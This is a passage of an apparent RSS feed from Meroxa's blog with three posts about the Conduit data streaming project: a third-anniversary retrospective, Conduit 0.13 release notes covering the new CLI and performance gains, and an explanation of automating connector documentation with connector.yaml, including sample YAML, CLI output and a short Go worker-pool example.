]]></description><link>https://meroxa.com/blog/celebrating-three-years-of-conduit-a-revolution-in-real-time-data-streaming</link><guid isPermaLink="false">https://meroxa.com/blog/celebrating-three-years-of-conduit-a-revolution-in-real-time-data-streaming</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 10 Feb 2025 12:30:00 GMT</pubDate><content:encoded>&lt;p&gt;✨ Three years ago, we set out to transform real-time data movement with &lt;strong&gt;Conduit&lt;/strong&gt;—a game-changer in the world of streaming technology! 💡 If you haven&apos;t yet, dive in now by exploring our &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;GitHub repository&lt;/a&gt; and joining our thriving &lt;a href=&quot;https://discord.gg/conduit&quot;&gt;community on Discord&lt;/a&gt;! 🌍 As we celebrate this milestone, we want to take a moment to reflect on why we built Conduit, express our deep appreciation for our incredible community, and highlight some key moments that have shaped our journey.&lt;/p&gt;
&lt;h4&gt;Why We Built Conduit&lt;/h4&gt;
&lt;p&gt;In today’s AI- and data-driven world, organizations need real-time data integration that is both scalable and easy to use. However, existing solutions often present significant challenges—complex architectures, high costs, and lack of flexibility. We built &lt;strong&gt;Conduit&lt;/strong&gt; to address these gaps by offering a developer-friendly, open-source data streaming platform that is lightweight, flexible, and easy to deploy. Our vision is &lt;em&gt;&lt;strong&gt;“A world where real-time data is the default.”&lt;/strong&gt;&lt;/em&gt; Our mission is &lt;em&gt;&lt;strong&gt;“Enable anyone to leverage real-time data regardless of technical ability.”&lt;/strong&gt;&lt;/em&gt; Learn more about our vision &lt;a href=&quot;https://conduit.io/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Messages from the team&lt;/h4&gt;
&lt;p&gt;To mark this special occasion, we’re reflecting on our journey, sharing insights from our team, and celebrating the incredible support from our community. Hear from the Conduit team and discover how collaboration has fueled innovation in real-time data streaming.&lt;/p&gt;
&lt;p&gt;“Not every collaboration fuels innovation in the same way—after all, no two collaborations are alike. And let me be honest: for much of the time, we’re doing what most teams do—working across distant time zones, brainstorming, reviewing code, debating design documents, and holding sync meetings.&lt;/p&gt;
&lt;p&gt;What truly sets my team apart is the difference in how we handle our differences. Like any group, we sometimes clash with completely opposing views. Sometimes we push our opinions passionately; other times, we pragmatically decide that progress matters more than the perfect solution. And occasionally, we admit that, as much as we love our own ideas, someone else’s might be the better path forward. This honest exchange of thoughts keeps us continually improving while moving forward together.”
&lt;strong&gt;- Haris Osmanagić, Software Engineer&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;“I&apos;ve worked on Conduit since its infancy, watching it grow from a closed-source internal tool to a mature open-source project. Over the years, we&apos;ve faced many challenges—technical, organizational, and personal—but we&apos;ve always found a way through as a team. That&apos;s no surprise, given the team&apos;s talent and dedication. I&apos;m proud of what we&apos;ve achieved so far and excited for Conduit&apos;s future and growing community!”&lt;br&gt;
&lt;strong&gt;- Lovro Mažgon, Software Engineer&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;“Looking back on the last four years of developing Conduit, it’s been a remarkable journey to see how an idea has grown into a thriving open-source project celebrating its third birthday. Our globally distributed team is super collaborative and supportive, and we’re never afraid to bring new perspectives to the table or challenge each other. I’m proud of the way we plan together, set clear goals, and consistently hit our milestones.&lt;/p&gt;
&lt;p&gt;As we prepare for the highly anticipated 1.0 release, I’m continuously reminded of how special this team is, the passion for innovation, and the commitment that we share. I’m also excited to see Conduit continue to grow and reach new heights, and can’t wait for the success we’ll achieve in the years to come.”&lt;br&gt;
&lt;strong&gt;- Maha Hajja, Software Engineer&lt;/strong&gt;&lt;/p&gt;
&lt;h4&gt;A Huge Thank You to Our Amazing Community!&lt;/h4&gt;
&lt;p&gt;🚀 &lt;strong&gt;Join our growing ecosystem and be part of the real-time data revolution!&lt;/strong&gt; Contribute, share your feedback, and engage with fellow developers. &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Get involved on GitHub&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;From the very beginning, the &lt;strong&gt;Conduit&lt;/strong&gt; community has been the driving force behind its success. Your feedback, contributions, and enthusiasm have helped shape Conduit into what it is today. Companies such as &lt;a href=&quot;https://www.netflix.com/&quot;&gt;&lt;strong&gt;Netflix&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.uber.com/&quot;&gt;&lt;strong&gt;Uber&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.airbnb.com/&quot;&gt;&lt;strong&gt;Airbnb&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.google.com/&quot;&gt;&lt;strong&gt;Google&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.microsoft.com/&quot;&gt;&lt;strong&gt;Microsoft&lt;/strong&gt;&lt;/a&gt;, and &lt;a href=&quot;https://www.ibm.com/&quot;&gt;&lt;strong&gt;IBM&lt;/strong&gt;&lt;/a&gt; have starred our repository, reflecting the widespread trust and adoption of our platform. Check out our GitHub repository &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Key Community Milestones&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;First Commit:&lt;/strong&gt; Made by &lt;a href=&quot;https://github.com/jmar910&quot;&gt;@jmar910&lt;/a&gt; on January 19, 2022. View the commit &lt;a href=&quot;https://github.com/ConduitIO/conduit/commit/a162eef6876ff1d02898663a0f25f5568925f1ba&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Public PR Contribution:&lt;/strong&gt; &lt;a href=&quot;https://github.com/heath&quot;&gt;@heath&lt;/a&gt; submitted the first PR on January 21, 2022, improving documentation. See it &lt;a href=&quot;https://github.com/ConduitIO/conduit-site/pull/2&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Public Comment on Discord:&lt;/strong&gt; Heath left the first comment on January 21, 2022, reinforcing open-source collaboration. Join our Discord &lt;a href=&quot;https://discord.gg/conduit&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Community Connector Submission:&lt;/strong&gt; The first community connector, &lt;strong&gt;Tinybird&lt;/strong&gt;, was introduced on Oct 25, 2022. Details &lt;a href=&quot;https://github.com/alejandromav/conduit-connector-tinybird&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Conduit&apos;s Evolution: Major Milestones &amp;#x26; Game-Changing Releases!&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.1.0&quot;&gt;Version 0.1.0&lt;/a&gt;: Laid the foundation for real-time data integration.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.6.0&quot;&gt;Version 0.6.0&lt;/a&gt;:  Introduced lifecycle events and improved metrics.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.7.0&quot;&gt;Version 0.7.0&lt;/a&gt;: Added Node.js support and schema registry updates.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.9.0&quot;&gt;Version 0.9.0&lt;/a&gt;: Major overhaul of processors and improved transformations.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.11.0&quot;&gt;Version 0.11.0&lt;/a&gt;: Comprehensive schema support and new connectors.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.12.0&quot;&gt;Version 0.12.0&lt;/a&gt;: Introduced Pipeline Recovery for resilient data streaming.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/changelog/2025-02-04-conduit-0-13-0-release&quot;&gt;Version 0.13.0&lt;/a&gt;: Celebrating 3 years with enhanced real-time collaboration and performance metrics.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Explore the full changelog &lt;a href=&quot;https://conduit.io/changelog&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h4&gt;Looking Ahead&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Want to shape the future of real-time data streaming?&lt;/strong&gt; Stay ahead with Conduit&apos;s latest developments and contribute to the next generation of data infrastructure. &lt;a href=&quot;https://conduit.io/&quot;&gt;Join us today&lt;/a&gt;!
We are more excited than ever about the future of Conduit.&lt;/p&gt;
&lt;p&gt;Our roadmap includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improved scalability&lt;/li&gt;
&lt;li&gt;More out-of-the-box connectors&lt;/li&gt;
&lt;li&gt;Deeper AI-driven analytics&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Stay updated on our latest developments on our &lt;a href=&quot;https://meroxa.com/blog/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🙏 &lt;strong&gt;THANK YOU&lt;/strong&gt; to our users, contributors, and supporters! &lt;strong&gt;Don&apos;t just follow the data revolution—lead it!&lt;/strong&gt; Start using Conduit, share your success stories, and help us build the future of real-time streaming. Want to be part of our future? The time is NOW! 🌟 &lt;a href=&quot;https://conduit.io/&quot;&gt;Join the movement&lt;/a&gt; and help us shape the future of data streaming!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here’s to the next chapter of Conduit!&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New Release Conduit 0.13: Advanced Automation, New CLI, and 5x Performance Gains]]></title><description><![CDATA[The latest Conduit 0.13 release brings significant upgrades, focusing on developer experience, automation, and performance optimization. Key highlights include automated documentation synchronization for connectors, a powerful new CLI for seamless pipeline and connector management, and 5x improvements in output processing speed, reducing latency and boosting efficiency. Notably, this version also deprecates the built-in UI, reinforcing Conduit’s commitment to a CLI-driven workflow. With expanded CLI capabilities and automated documentation tools, developers can now manage data pipelines more efficiently than ever. Upgrade today to leverage these new features and maximize your real-time data processing capabilities! 🚀
]]></description><link>https://meroxa.com/blog/new-release-conduit-013-advanced-automation-new-cli-and-5x-performance-gains</link><guid isPermaLink="false">https://meroxa.com/blog/new-release-conduit-013-advanced-automation-new-cli-and-5x-performance-gains</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 07 Feb 2025 10:47:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.13 is here, delivering major enhancements to &lt;strong&gt;developer experience, automation, and performance optimization&lt;/strong&gt;. This release focuses on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated documentation synchronization for connectors&lt;/strong&gt;, ensuring up-to-date and consistent documentation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A powerful new Conduit CLI&lt;/strong&gt;, providing fine-grained control over pipeline and connector management.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;5x output performance improvements&lt;/strong&gt;, drastically reducing processing latency and optimizing resource utilization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deprecation of the User Interface&lt;/strong&gt;, aligning with our focus on CLI-driven workflows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expanded CLI capabilities&lt;/strong&gt;, providing a more comprehensive command set for Conduit management.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s dive into the technical details of what’s new, why these changes matter, and how you can leverage them.&lt;/p&gt;
&lt;p&gt;🚀 &lt;strong&gt;Upgrade to Conduit 0.13 today!&lt;/strong&gt; Download the latest release and start building faster, more efficient pipelines. &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;Read the release notes&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;💡 &lt;strong&gt;Have questions?&lt;/strong&gt; Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord community&lt;/a&gt; and discuss with fellow developers!&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Deprecation of the User Interface&lt;/h2&gt;
&lt;p&gt;Conduit no longer includes a built-in User Interface. This decision aligns with our focus on providing a streamlined, command-line-centric workflow that better fits the needs of our users.&lt;/p&gt;
&lt;p&gt;For those seeking a graphical interface, the fully featured UI is available as part of the &lt;a href=&quot;https://conduit.io/platform&quot;&gt;Conduit Platform&lt;/a&gt;, our separate product offering designed to meet enterprise requirements.&lt;/p&gt;
&lt;p&gt;📢 &lt;strong&gt;Need a UI?&lt;/strong&gt; Explore the &lt;a href=&quot;https://conduit.io/platform&quot;&gt;Conduit Platform&lt;/a&gt; for a fully managed experience.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Expanded Command-Line Interface (CLI) Capabilities&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;The Conduit CLI has been enhanced to offer more &lt;strong&gt;comprehensive management capabilities&lt;/strong&gt;. By expanding available commands, we provide developers with a &lt;strong&gt;powerful toolset&lt;/strong&gt; for configuring and maintaining data pipelines.&lt;/p&gt;
&lt;h3&gt;How It Works&lt;/h3&gt;
&lt;p&gt;To run the Conduit service, simply execute:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit run
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the &lt;code class=&quot;language-text&quot;&gt;conduit&lt;/code&gt; command without arguments will display all available commands and options:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit
Conduit CLI is a command-line tool that helps you interact with and manage Conduit.

Usage:
  conduit [flags]
  conduit [command]

Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins
  connectors        Manage Conduit Connectors
  help              Help about any command
  init              Initialize Conduit with a configuration file and directories.
  open              Open in a web browser
  pipelines         Initialize and manage pipelines
  processor-plugins Manage Processor Plugins
  processors        Manage Processors
  run               Run Conduit
  version           Show the current version of Conduit.

Flags:
      --api.grpc.address string   address where Conduit is running
      --config.path string        path to the configuration file
  -h, --help                      help for conduit
  -v, --version                   show the current Conduit version

Use &quot;conduit [command] --help&quot; for more information about a command.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With these improvements, users can now execute all necessary Conduit operations &lt;strong&gt;seamlessly from the command line&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;⚡ &lt;strong&gt;Try it now!&lt;/strong&gt; Use &lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt; to explore all available commands.&lt;/p&gt;
&lt;p&gt;📖 &lt;strong&gt;New to Conduit?&lt;/strong&gt; Check out our &lt;a href=&quot;https://meroxa.com/blog/introducing-the-new-conduit-cli:-a-powerful-tool-for-managing-your-pipelines/&quot;&gt;blog&lt;/a&gt; for more details on getting started quickly!&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Automating Connector Documentation with &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;Maintaining &lt;strong&gt;accurate, up-to-date documentation&lt;/strong&gt; for Conduit&apos;s extensive connector ecosystem has been a challenge. Manual updates to README files often lag behind code changes, leading to inconsistencies that can slow down development and debugging.&lt;/p&gt;
&lt;h3&gt;How We Solved It&lt;/h3&gt;
&lt;p&gt;Previously, each connector’s configuration was stored separately in README files, requiring &lt;strong&gt;manual updates&lt;/strong&gt; every time a configuration parameter changed. This approach was inefficient and error-prone. To address this, Conduit 0.13 introduces &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;&lt;/strong&gt;, a structured metadata file that centralizes all essential connector details and automates documentation synchronization.&lt;/p&gt;
&lt;p&gt;🛠 &lt;strong&gt;Start automating your connector documentation today!&lt;/strong&gt; Implement &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; in your repository and run the &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; command to ensure your documentation is always up to date.&lt;/p&gt;
&lt;p&gt;⚡ &lt;strong&gt;Try it now!&lt;/strong&gt; Run &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; to sync your documentation instantly.&lt;/p&gt;
&lt;p&gt;📘 &lt;strong&gt;Need help?&lt;/strong&gt; Follow our &lt;a href=&quot;https://conduit.io/docs/developing/connectors&quot;&gt;developer guide&lt;/a&gt; for best practices. Read more details in our &lt;a href=&quot;https://meroxa.com/blog/automating-documentation-for-100+-connectors/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
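As a rough sketch of the shape (condensed and illustrative only; see the developer guide above for the full schema), a `connector.yaml` centralizes the connector's metadata alongside its parameter definitions and validations:

```yaml
version: "1.0"
specification:
  name: my-connector        # illustrative name
  summary: A one-line summary of the connector.
  description: |-
    A longer, Markdown-capable description of what the
    connector does.
  version: v0.1.0
  author: Example, Inc.
  source:
    parameters:
      - name: path
        description: Path used by the connector to read records.
        type: string
        default: ""
        validations:
          - type: required
            value: ""
```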
&lt;hr&gt;
&lt;h2&gt;5x Performance Boost for Output Processing&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;For high-throughput data streaming, performance is critical. Previously, output processing could become a bottleneck in large-scale workloads, leading to latency and inefficiencies.&lt;/p&gt;
&lt;h3&gt;How We Improved It&lt;/h3&gt;
&lt;p&gt;Conduit 0.13 introduces a &lt;strong&gt;5x increase in output throughput&lt;/strong&gt;, achieved through:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Parallelized Processing&lt;/strong&gt; - Output tasks now run concurrently, reducing execution bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized Memory Allocation&lt;/strong&gt; - Enhanced buffer management leads to lower memory overhead and increased efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lock-Free Data Processing&lt;/strong&gt; - Reduced contention on shared resources significantly speeds up write operations.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/worker-task.png&quot; alt=&quot;worker-task.png&quot;&gt;&lt;/p&gt;
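The first two techniques can be sketched in a few lines of Go. This is a self-contained illustration, not Conduit's actual code (all names here are invented): output tasks are fanned out to a fixed set of worker goroutines, and a `sync.Pool` recycles buffers to cut allocation overhead:

```go
// Illustrative sketch: fan output work out to a fixed pool of workers
// so writes proceed concurrently instead of serially, and reuse
// buffers to keep memory overhead low.
package main

import (
	"fmt"
	"sync"
)

// processRecord stands in for the per-record output work.
func processRecord(buf []byte, rec string) string {
	buf = append(buf[:0], rec...) // reuse the buffer's backing array
	return "written:" + string(buf)
}

func runWorkers(records []string, workers int) []string {
	in := make(chan string)
	out := make(chan string)

	// A pool of reusable buffers avoids allocating per record.
	bufPool := sync.Pool{New: func() any { return make([]byte, 0, 1024) }}

	var wg sync.WaitGroup
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for rec := range in {
				buf := bufPool.Get().([]byte)
				out <- processRecord(buf, rec)
				bufPool.Put(buf)
			}
		}()
	}

	// Feed records, then close channels once all workers finish.
	go func() {
		for _, r := range records {
			in <- r
		}
		close(in)
		wg.Wait()
		close(out)
	}()

	var results []string
	for r := range out {
		results = append(results, r)
	}
	return results
}

func main() {
	got := runWorkers([]string{"a", "b", "c", "d"}, 3)
	fmt.Println(len(got)) // 4 results; ordering may vary across runs
}
```

Note that with concurrent workers, result ordering is no longer guaranteed; a real pipeline must account for that when acknowledging records.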
&lt;p&gt;🚀 &lt;strong&gt;Optimize your workflows today!&lt;/strong&gt; Upgrade to Conduit 0.13 to experience these performance improvements firsthand.&lt;/p&gt;
&lt;p&gt;📊 &lt;strong&gt;Curious about the benchmarks?&lt;/strong&gt; Read our &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit---5x-the-throughput/&quot;&gt;performance deep dive&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Get Started with Conduit 0.13 Today&lt;/h2&gt;
&lt;p&gt;The enhancements in Conduit 0.13 make it a &lt;strong&gt;more powerful, developer-friendly platform&lt;/strong&gt; for building scalable real-time pipelines. Whether you’re automating documentation, leveraging the new CLI, or enjoying high-throughput data movement, this release delivers meaningful improvements.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;✅ &lt;strong&gt;Start using the Conduit CLI&lt;/strong&gt;: &lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt;
✅ &lt;strong&gt;Automate connector documentation&lt;/strong&gt; with &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;
✅ &lt;strong&gt;Experience performance gains&lt;/strong&gt; with 5x output speed improvements
✅ &lt;strong&gt;Read the full release notes&lt;/strong&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;💬 &lt;strong&gt;We’d love your feedback!&lt;/strong&gt; Join the conversation on &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or start a discussion in our &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;. 🚀&lt;/p&gt;
&lt;p&gt;📝 &lt;strong&gt;Stay Updated!&lt;/strong&gt; Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Automating documentation for 100+ connectors]]></title><description><![CDATA[The Conduit 0.13 release introduces `connector.yaml`, a powerful automation tool that ensures connector documentation stays up to date with the latest configuration changes. By centralizing connector metadata—such as parameters, descriptions, and validation rules—developers can seamlessly sync documentation across repositories and the official Conduit docs. With the `conn-sdk-cli` tool, updating documentation is as simple as running a command, eliminating manual updates and reducing errors. This release enhances the developer experience, improves documentation consistency, and streamlines real-time data pipeline management. Start using `connector.yaml` today and automate your documentation workflow! 🚀]]></description><link>https://meroxa.com/blog/automating-documentation-for-100-connectors</link><guid isPermaLink="false">https://meroxa.com/blog/automating-documentation-for-100-connectors</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Wed, 05 Feb 2025 19:27:00 GMT</pubDate><content:encoded>&lt;p&gt;Managing &lt;strong&gt;real-time data pipelines&lt;/strong&gt; across hundreds of different systems requires &lt;strong&gt;consistent, accurate, and up-to-date documentation&lt;/strong&gt;. With Conduit 0.13, we’ve automated &lt;strong&gt;connector documentation&lt;/strong&gt; using &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;, ensuring &lt;strong&gt;seamless synchronization between code and documentation&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Challenge: Keeping Connector Documentation in Sync&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit supports &lt;strong&gt;reading and writing data&lt;/strong&gt; to hundreds of systems. As the number of connectors grows, &lt;strong&gt;maintaining consistent documentation&lt;/strong&gt; becomes increasingly difficult. Traditionally, connector configurations were documented in &lt;strong&gt;README files&lt;/strong&gt; within repositories, requiring &lt;strong&gt;manual updates&lt;/strong&gt; whenever a parameter changed. Over time, this led to outdated information and increased developer friction.&lt;/p&gt;
&lt;h3&gt;Goals&lt;/h3&gt;
&lt;h4&gt;1: Connector configuration is documented and always up-to-date&lt;/h4&gt;
&lt;p&gt;A connector’s configuration is usually documented in the README file in the connector’s repository. As the configuration changes in code, it’s easy to forget to update the README file, especially if the changes are small (like changing a parameter’s default value or description). This process, therefore, needs to be automated.&lt;/p&gt;
&lt;h4&gt;2: A central place with all connector information&lt;/h4&gt;
&lt;p&gt;Having a central place with all the connector information makes it easier to explore Conduit and find the components needed to build and configure a pipeline. This place is &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;our website&lt;/a&gt;, where we already have a &lt;a href=&quot;https://conduit.io/docs/using/connectors/list/&quot;&gt;list&lt;/a&gt; of connectors, and where we will be adding dedicated documentation pages for each connector.&lt;/p&gt;
&lt;h4&gt;3: Easy to use for developers&lt;/h4&gt;
&lt;p&gt;All the documentation needs to be in sync with the configuration code written by a connector&apos;s developer. Every connector has a description that can become quite lengthy and, in our experience, is very cumbersome to write in the code. Plus, there are no formatting options. Hence, our goal was to give developers an easy way to keep the documentation in sync with the code and to easily describe what a connector does.&lt;/p&gt;
&lt;h3&gt;The solution&lt;/h3&gt;
&lt;p&gt;The source of truth for a connector’s configuration is in the code, in the configuration structs. That means that the process that updates a connector’s README file and our website needs to read the configuration code (&lt;em&gt;eventually&lt;/em&gt;). However, the code is not enough. As mentioned above, connector descriptions are best placed outside the connector code.&lt;/p&gt;
&lt;p&gt;That led us to a solution where a connector’s specification (name, description, configuration parameters, etc.) is written to a file that can easily be read by other tools, i.e. one in a widely used format. That’s how &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; was born.&lt;/p&gt;
&lt;h3&gt;What is &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;?&lt;/h3&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; is a file that contains information about a connector and its parameter validations. It’s central to all of our tooling that ensures the documentation is always up-to-date and can be collected into a single place.&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; lives in the root of a connector&apos;s repository. The following is an example of the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-file&quot;&gt;file connector&apos;s&lt;/a&gt; &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.0&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;specification&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file
  &lt;span class=&quot;token key atrule&quot;&gt;summary&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; A file source and destination plugin for Conduit.
  &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;
    The file source allows you to listen to a local file and
    detect any changes happening to it. Each change will create a new record. The
    destination allows you to write record payloads to a destination file&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; each new record payload is appended to the file in a new line.
  &lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; v0.10.0
  &lt;span class=&quot;token key atrule&quot;&gt;author&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Meroxa&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Inc.
  &lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;parameters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; path
        &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Path is the file path used by the connector to read/write records.
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
        &lt;span class=&quot;token key atrule&quot;&gt;default&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;validations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; required
            &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
